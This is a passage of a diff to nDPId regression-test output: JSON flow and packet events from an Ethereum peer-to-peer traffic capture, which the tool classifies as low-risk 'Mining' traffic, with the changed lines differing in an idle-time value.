+00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1414,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1578508365628,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365628,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAACcGqoHKcBxqwKgBuHZf3U9YWyaeOLFgJqAScSDw0wAAAgQFrAQCCAonH\/CcItiWswEDAwg="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1415,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1578508365628,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365628,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGkYnAqAG4ynAcat1Pdl84sWAmWFsmn4AQECx\/AQAAAQEICiLYmD8nH\/Cc"} +00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1416,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365194,"flow_last_seen":1578508365630,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":494,"flow_tot_l4_payload_len":494,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1578508365630,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"202.112.28.106","src_port":56655,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1417,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":2,"flow_last_seen":1578508365631,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365631,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIGPLJWa\/M+wKgBuHZf3V\/moIrRbH+L1qAScSBDVwAAAgQFrAQCCApQzL4rItiYHgEDAwc="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1418,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":3,"flow_last_seen":1578508365631,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365631,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGLrrAqAG4VmvzPt1fdl9sf4vW5qCK0oAQECzS7AAAAQEICiLYmEFQzL4r"} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1419,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1578508365631,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365631,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADMGY9OnVnoywKgBuHZf3V5M8kZiXHG48aAScSAfsAAAAgQFrAQCCArTe0haItiYGgEDAwc="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1420,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1578508365631,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365631,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGVtvAqAG4p1Z6Mt1edl9ccbjxTPJGY4AQECyvQQAAAQEICiLYmEHTe0ha"} 
+00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1421,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365592,"flow_last_seen":1578508365632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":540,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1578508365632,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"86.107.243.62","src_port":56671,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1422,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365588,"flow_last_seen":1578508365633,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":389,"flow_tot_l4_payload_len":389,"flow_avg_l4_payload_len":97,"midstream":0,"thread_ts_msec":1578508365633,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"167.86.122.50","src_port":56670,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1463,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1578508365688,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365688,"pkt":"KDc3AG3IEBMx8Tl2CABFCAA8AABAACwGI8Z82eu0wKgBuHZf3VfxiPe9S9oGI6AScSAoCwAAAgQFrAQCCArI+HIBItiXEAEDAwc="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1464,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1578508365688,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365688,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGD9bAqAG4fNnrtN1Xdl9L2gYj8Yj3voAQECy2XAAAAQEICiLYmHfI+HIB"} +00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1465,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365300,"flow_last_seen":1578508365690,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":545,"flow_tot_l4_payload_len":545,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1578508365690,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"124.217.235.180","src_port":56663,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1484,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365701,"flow_last_seen":1578508365701,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365701,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"139.162.255.210","src_port":56672,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1484,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1578508365701,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365701,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG7OLAqAG4i6L\/0t1gdl\/B\/P6FAAAAALAC\/\/8ZigAAAgQFtAEDAwUBAQgKItiYggAAAAAEAgAA"} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1517,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365712,"flow_last_seen":1578508365712,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365712,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"78.47.147.155","src_port":56673,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1517,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1578508365712,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365712,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGlo3AqAG4Ti+Tm91hdl8xKZuYAAAAALAC\/\/+26gAAAgQFtAEDAwUBAQgKItiYjAAAAAAEAgAA"} 00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1521,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1578508365736,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1578508365736,"pkt":"EBMx8Tl2KDc3AG3ICABFAADHpIMAAEARoqnAqAG4b+UAtHZfTtYAsxSK2l5Lj\/FNPSwNskN7KXHg69sINFX5NaCleeEwgXwmONn61xupKUye1QOfHD1DMyDw8Rv4bxSGME4AJ9XC7q+0Pwz+NqNAUtNYGL1TDF+F5wROIhyoide5OcgIFnuRD6baAQP4R7hAggEUSZWpWZm0YK3HCqZiBR7sHJ3wp8USPzyX73HGoWVqts4UjRd8TfDxZuCIPe7jI\/CXMWJB7l7pTCCyfJvg8YReFiBh"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1536,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365741,"flow_last_seen":1578508365741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365741,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"94.68.55.162","src_port":56674,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1536,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1578508365741,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365741,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG4nHAqAG4XkQ3ot1idl9YCAHzAAAAALAC\/\/91dwAAAgQFtAEDAwUBAQgKItiYqQAAAAAEAgAA"} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1539,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":2,"flow_last_seen":1578508365742,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365742,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIG+uaLov\/SwKgBuHZf3WDeocLiwfz+hqAS\/ogDJwAAAgQFrAQCCArjm6OzItiYggEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1540,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":3,"flow_last_seen":1578508365742,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365742,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG7O7AqAG4i6L\/0t1gdl\/B\/P6G3qHC44AQECwgIAAAAQEICiLYmKrjm6Oz"} 
-00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1543,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365701,"flow_last_seen":1578508365744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":386,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1578508365744,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"139.162.255.210","src_port":56672,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1566,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365751,"flow_last_seen":1578508365751,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365751,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.235.37.216","src_port":56675,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1566,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1578508365751,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365751,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGLpXAqAG4I+sl2N1jdl9d8bObAAAAALAC\/\/8KAAAAAgQFtAEDAwUBAQgKItiYsQAAAAAEAgAA"} 
-00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1567,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":2,"flow_last_seen":1578508365752,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365752,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAAC4GqJFOL5ObwKgBuHZf3WHPYyPBMSmbmaAScSA0jAAAAgQFrAQCCApPJ9\/rItiYjAEDAwc="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1568,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":3,"flow_last_seen":1578508365753,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365753,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGlpnAqAG4Ti+Tm91hdl8xKZuZz2MjwoAQECzEHgAAAQEICiLYmLJPJ9\/r"} -00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1569,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365712,"flow_last_seen":1578508365754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":567,"flow_tot_l4_payload_len":567,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1578508365754,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"78.47.147.155","src_port":56673,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1581,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":2,"flow_last_seen":1578508365776,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365776,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADsGM5kj6yXYwKgBuHZf3WOqScTQXfGznKAS\/ohykQAAAgQFrAQCCAo1IQWkItiYsQEDAwc="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1582,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":3,"flow_last_seen":1578508365777,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365777,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGLqHAqAG4I+sl2N1jdl9d8bOcqknE0YAQECyPmwAAAQEICiLYmMg1IQWk"} -00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1583,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365751,"flow_last_seen":1578508365778,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":530,"flow_tot_l4_payload_len":530,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1578508365778,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.235.37.216","src_port":56675,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1536,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365741,"flow_last_seen":1578508365741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365741,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"94.68.55.162","src_port":56674,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1536,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1578508365741,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365741,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG4nHAqAG4XkQ3ot1idl9YCAHzAAAAALAC\/\/91dwAAAgQFtAEDAwUBAQgKItiYqQAAAAAEAgAA"} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1539,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":2,"flow_last_seen":1578508365742,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365742,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIG+uaLov\/SwKgBuHZf3WDeocLiwfz+hqAS\/ogDJwAAAgQFrAQCCArjm6OzItiYggEDAwc="} 
+00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1540,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":3,"flow_last_seen":1578508365742,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365742,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG7O7AqAG4i6L\/0t1gdl\/B\/P6G3qHC44AQECwgIAAAAQEICiLYmKrjm6Oz"} +00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1543,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365701,"flow_last_seen":1578508365744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":386,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1578508365744,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"139.162.255.210","src_port":56672,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1566,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365751,"flow_last_seen":1578508365751,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365751,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.235.37.216","src_port":56675,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1566,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1578508365751,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365751,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGLpXAqAG4I+sl2N1jdl9d8bObAAAAALAC\/\/8KAAAAAgQFtAEDAwUBAQgKItiYsQAAAAAEAgAA"} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1567,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":2,"flow_last_seen":1578508365752,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365752,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAAC4GqJFOL5ObwKgBuHZf3WHPYyPBMSmbmaAScSA0jAAAAgQFrAQCCApPJ9\/rItiYjAEDAwc="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1568,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":3,"flow_last_seen":1578508365753,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365753,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGlpnAqAG4Ti+Tm91hdl8xKZuZz2MjwoAQECzEHgAAAQEICiLYmLJPJ9\/r"} 
+00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1569,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365712,"flow_last_seen":1578508365754,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":567,"flow_tot_l4_payload_len":567,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1578508365754,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"78.47.147.155","src_port":56673,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1581,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":2,"flow_last_seen":1578508365776,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365776,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADsGM5kj6yXYwKgBuHZf3WOqScTQXfGznKAS\/ohykQAAAgQFrAQCCAo1IQWkItiYsQEDAwc="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1582,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":3,"flow_last_seen":1578508365777,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365777,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGLqHAqAG4I+sl2N1jdl9d8bOcqknE0YAQECyPmwAAAQEICiLYmMg1IQWk"} 
+00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1583,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365751,"flow_last_seen":1578508365778,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":530,"flow_tot_l4_payload_len":530,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1578508365778,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.235.37.216","src_port":56675,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1586,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1578508365781,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1578508365781,"pkt":"EBMx8Tl2KDc3AG3ICABFAADHjqoAAEARyLjAqAG40WGPAXZfw1AAs7BF2l5Lj\/FNPSwNskN7KXHg69sINFX5NaCleeEwgXwmONn61xupKUye1QOfHD1DMyDw8Rv4bxSGME4AJ9XC7q+0Pwz+NqNAUtNYGL1TDF+F5wROIhyoide5OcgIFnuRD6baAQP4R7hAggEUSZWpWZm0YK3HCqZiBR7sHJ3wp8USPzyX73HGoWVqts4UjRd8TfDxZuCIPe7jI\/CXMWJB7l7pTCCyfJvg8YReFiBh"} 